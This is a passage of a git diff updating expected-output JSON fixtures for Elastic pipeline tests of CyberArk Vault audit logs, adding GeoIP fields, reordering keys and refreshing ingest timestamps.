\u003cSourceUser\u003ePSMPGW_SSH\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:35\",\"IsoTimestamp\":\"2021-03-14T13:49:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway 
Connection\",\"SourceUser\":\"PSMPGW_SSH\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"67.43.156.15\"}}}", "code": "19", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-20-partial-gateway-connection.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-20-partial-gateway-connection.log-expected.json index ed45fb133ef..99ede54c704 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-20-partial-gateway-connection.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-20-partial-gateway-connection.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "10.0.0.15", - "ip": "10.0.0.15" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VLT01", @@ -28,6 +16,11 @@ "10.0.0.15" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -46,14 +39,21 @@ "host": { "name": "VLT01" }, + "source": { + "address": "10.0.0.15", + "ip": "10.0.0.15" + }, "event": { "severity": 2, "action": "partial gateway connection", - "ingested": "2021-12-09T13:36:40.675511Z", + "ingested": "2021-12-14T14:42:04.837900088Z", "original": "\u003c5\u003e1 2021-03-25T09:20:07Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 05:20:07\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T09:20:07Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e20\u003c/MessageID\u003e\\n \u003cDesc\u003ePartial Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMGw_COMP01\u003c/Issuer\u003e\\n \u003cAction\u003ePartial Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003eAdministrator\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePartial Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 
05:20:07\",\"IsoTimestamp\":\"2021-03-25T09:20:07Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"20\",\"Desc\":\"Partial Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"PSMGw_COMP01\",\"Action\":\"Partial Gateway Connection\",\"SourceUser\":\"Administrator\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Partial Gateway Connection\",\"GatewayStation\":\"\"}}}", "code": "20", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-202-old-backup-files-deletion-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-202-old-backup-files-deletion-start.log-expected.json index f91eafda9e4..209e1cf6e5c 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-202-old-backup-files-deletion-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-202-old-backup-files-deletion-start.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "old backup files deletion start", - "ingested": "2021-12-09T13:36:40.797519200Z", + "ingested": "2021-12-14T14:42:04.957314489Z", "original": "\u003c5\u003e1 2021-03-09T10:17:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:17:54\",\"IsoTimestamp\":\"2021-03-09T10:17:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"202\",\"Desc\":\"Old Backup Files Deletion Start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Old Backup Files Deletion Start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Old Backup Files Deletion Start\",\"GatewayStation\":\"\"}}}", "code": "202", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-203-old-backup-files-deletion-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-203-old-backup-files-deletion-end.log-expected.json index e7b1f09d867..81e348f46ee 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-203-old-backup-files-deletion-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-203-old-backup-files-deletion-end.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", 
@@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "old backup files deletion end", - "ingested": "2021-12-09T13:36:40.949257400Z", + "ingested": "2021-12-14T14:42:05.068897130Z", "original": "\u003c5\u003e1 2021-03-09T10:17:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:17:54\",\"IsoTimestamp\":\"2021-03-09T10:17:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"203\",\"Desc\":\"Old Backup Files Deletion End\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Old Backup Files Deletion End\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Old Backup Files Deletion End\",\"GatewayStation\":\"\"}}}", "code": "203", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log-expected.json index ffafb7bd4ff..e38ce386021 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-22-cpm-verify-password.log-expected.json 
@@ -79,7 +79,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:41.072867800Z", + "ingested": "2021-12-14T14:42:05.178379270Z", "original": "Apr 07 09:51:42 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e22\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12\u003c/File\u003e\\n \u003cStation\u003e10.2.0.4\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=radiussrv.cyberark.local;username=test12;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"test12\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"LastSuccessVerification\\\" Value=\\\"1604943844\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"22\",\"Desc\":\"CPM Verify Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12\",\"Station\":\"10.2.0.4\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=radiussrv.cyberark.local;username=test12;\",\"Message\":\"CPM Verify Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"test12\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1604943844\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"}]}}}}", "code": "22", "kind": "event", @@ -104,10 +104,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -186,7 +195,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:41.072873500Z", + "ingested": "2021-12-14T14:42:05.178382164Z", "original": "\u003c5\u003e1 2021-03-15T10:22:44Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:22:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:22:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e22\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" 
Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:22:44\",\"IsoTimestamp\":\"2021-03-15T10:22:44Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"22\",\"Desc\":\"CPM Verify Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=67.43.156.15;username=testark;\",\"Message\":\"CPM Verify Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "22", "kind": "event", 
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log-expected.json index 015a865644a..2a8450a7ba6 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 7 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 7 + } + }, "cyberarkpas": { "audit": { "severity": "Error", 
@@ -45,29 +38,33 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:36:41.393352600Z", + "ingested": "2021-12-14T14:42:05.495507844Z", "original": "\u003c7\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"23\",\"Desc\":\"Action On Closed Safe\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"Action On Closed Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Action On Closed Safe\",\"GatewayStation\":\"\"}}}", "code": "23", "kind": "event", "action": "action on closed safe", "type": "error" - } - }, - { - "log": { - "syslog": { - "priority": 7 - } - }, - "source": { - "address": "10.0.1.20", - "ip": "10.0.1.20" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -83,6 +80,11 @@ "10.0.1.20" ] }, + "log": { + "syslog": { + "priority": 7 + } + }, "cyberarkpas": { "audit": { "severity": "Error", 
@@ -101,29 +103,24 @@ "host": { "name": "VAULT" }, + "source": { + "address": "10.0.1.20", + "ip": "10.0.1.20" + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:36:41.393360900Z", + "ingested": "2021-12-14T14:42:05.495510359Z", "original": "\u003c7\u003e1 2021-03-14T12:07:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:07:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:07:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e23\u003c/MessageID\u003e\\n \u003cDesc\u003eAction On Closed Safe\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eAction On Closed Safe\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eAccountsFeedADAccounts\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAction On Closed Safe\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:07:27\",\"IsoTimestamp\":\"2021-03-14T12:07:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"23\",\"Desc\":\"Action On Closed 
Safe\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"Action On Closed Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"AccountsFeedADAccounts\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Action On Closed Safe\",\"GatewayStation\":\"\"}}}", "code": "23", "kind": "event", "action": "action on closed safe", "type": "error" - } - }, - { - "log": { - "syslog": { - "priority": 7 - } - }, - "source": { - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -139,6 +136,11 @@ "67.43.156.15" ] }, + "log": { + "syslog": { + "priority": 7 + } + }, "cyberarkpas": { "audit": { "severity": "Error", 
@@ -157,15 +159,31 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", + "ip": "67.43.156.15" + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:36:41.393365600Z", + "ingested": "2021-12-14T14:42:05.495510853Z", "original": "\u003c7\u003e1 2021-03-14T12:57:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e23\u003c/MessageID\u003e\\n \u003cDesc\u003eAction On Closed Safe\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAction On Closed Safe\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPConf\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAction On Closed Safe\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
05:57:16\",\"IsoTimestamp\":\"2021-03-14T12:57:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"23\",\"Desc\":\"Action On Closed Safe\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"Action On Closed Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Action On Closed Safe\",\"GatewayStation\":\"\"}}}", "code": "23", "kind": "event", "action": "action on closed safe", "type": "error" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-24-cpm-change-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-24-cpm-change-password.log-expected.json index ce8b170d2df..527d21febca 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-24-cpm-change-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-24-cpm-change-password.log-expected.json 
